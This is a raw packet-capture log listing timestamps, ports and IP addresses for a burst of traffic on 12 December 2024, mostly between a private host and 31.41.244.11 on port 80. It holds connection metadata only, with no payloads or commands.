Dec 12, 2024 16:48:25.238351107 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.238394022 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.239521027 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.239566088 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.239568949 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.239609957 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.240772963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.240834951 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.240854979 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.240902901 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.241913080 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.241966009 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.241976023 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.242011070 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.243119955 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.243170977 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.243222952 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.243268013 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.244417906 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.244440079 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.244548082 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.244548082 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.245508909 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.245569944 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.245745897 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.245790005 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.246709108 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.246757984 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.246844053 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.246895075 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.247946978 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.247997046 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.248060942 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.248109102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.249166012 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.249188900 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.249217033 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.249249935 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.250507116 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.250560999 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.250597000 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.250646114 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.251488924 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.251538992 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.251624107 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.251669884 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.252695084 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.252746105 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.252782106 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.252823114 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.253952026 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.253994942 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.254066944 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.254113913 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.255280018 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.255320072 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.255412102 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.255471945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.256412029 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.256465912 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.256498098 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.256547928 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.257811069 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.257862091 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.258660078 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.258708954 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.259105921 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.259151936 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.259210110 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.259249926 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.260003090 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.260056019 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.260258913 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.260308027 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.261190891 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.261254072 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.261276007 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.261323929 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.262352943 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.262404919 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.262406111 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.262447119 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.263514042 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.263564110 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.263581991 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.263626099 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.264759064 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.264806032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.264857054 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.264924049 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.265937090 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.265986919 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.265997887 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.266033888 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.267246008 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.267306089 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.267312050 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.267357111 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.268618107 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.268676996 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.268754005 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.268805981 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.269721985 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.269787073 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.269788027 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.269850016 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.270745039 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.270837069 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.270869017 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.270888090 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.271943092 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.272008896 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.272064924 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.272109032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.273179054 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.273241043 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.273258924 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.273330927 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.274454117 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.274528980 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.274559975 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.274673939 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.275510073 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.275563955 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.275650978 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.275706053 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.276731968 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.276787996 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.276824951 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.276874065 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.277920008 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.277970076 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.278004885 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.278047085 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.279396057 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.279464960 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.279474020 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.279503107 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.280282021 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.280332088 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.280405045 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.280450106 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.281538010 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.281594992 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.281622887 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.281785965 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.282670021 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.282726049 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.282851934 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.282905102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.283914089 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.283968925 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.284030914 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.284085035 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.285033941 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.285082102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.285099030 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.285144091 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.286294937 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.286343098 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.286417961 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.286463022 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.287482023 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.287532091 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.287547112 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.287587881 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.288639069 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.288703918 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.417809963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.417823076 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.417876959 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.418047905 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.418092966 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.418195963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.418239117 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.419337034 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.419384003 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.419420004 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.419457912 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.420444965 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.420488119 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.420506954 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.420599937 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.421711922 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.421756029 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.421833992 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.421874046 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.422887087 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.422930002 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.422959089 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.422996998 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.424031019 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.424134016 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.424154997 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.424165010 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.425201893 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.425246954 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.425282001 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.425317049 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.426438093 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.426491976 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.426527023 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.426565886 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.428041935 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.428091049 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.428267956 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.428314924 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.429259062 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.429301977 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.429327011 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.429367065 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.430267096 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.430318117 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.430357933 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.430402994 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.431400061 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.431447029 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.431494951 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.431519985 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.432356119 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.432410002 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.432565928 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.432610989 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.433593035 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.433639050 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.433762074 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.433804035 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.434694052 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.434720039 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.434761047 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.434803009 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.434817076 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.434851885 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.436492920 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.436580896 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.436597109 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.436640978 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.437129974 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.437177896 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.437299967 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.437407970 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.438380957 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.438424110 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.438483953 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.438529015 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.439537048 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.439583063 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.439618111 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.439680099 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.440694094 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.440737009 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.440766096 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.440803051 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.441910982 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.441996098 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.442162991 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.442209959 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.443109035 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.443151951 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.443183899 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.443224907 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.444292068 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.444338083 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.444397926 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.444432020 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.445468903 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.445542097 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.445574999 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.445684910 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.446686029 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.446729898 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.446763039 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.446799040 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.447865963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.447911978 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.447953939 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.447978020 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.448005915 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.448040962 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.449070930 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.449110985 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.449275017 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.449321032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.450225115 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.450277090 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.450337887 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.450387001 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.451427937 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.451478958 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.451558113 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.451597929 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.452681065 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.452725887 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.452801943 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.452840090 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.453838110 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.453881025 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.453915119 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.454020023 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.455003023 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.455123901 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.455144882 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.455194950 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.456226110 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.456264973 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.456305027 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.456338882 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.457572937 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.457613945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.457657099 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.457695961 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.458643913 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.458686113 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.458888054 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.458926916 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.459780931 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.459835052 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.459876060 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.459917068 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.460964918 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.461014986 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.461033106 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.461070061 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.462153912 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.462198019 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.462234020 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.462272882 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.463340998 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.463387012 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.463416100 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.463449955 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.464560032 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.464605093 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.464704037 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.464741945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.465778112 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.465817928 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.465910912 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.466341972 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.466926098 CET	80	49890	31.41.244.11	192.168.2.10
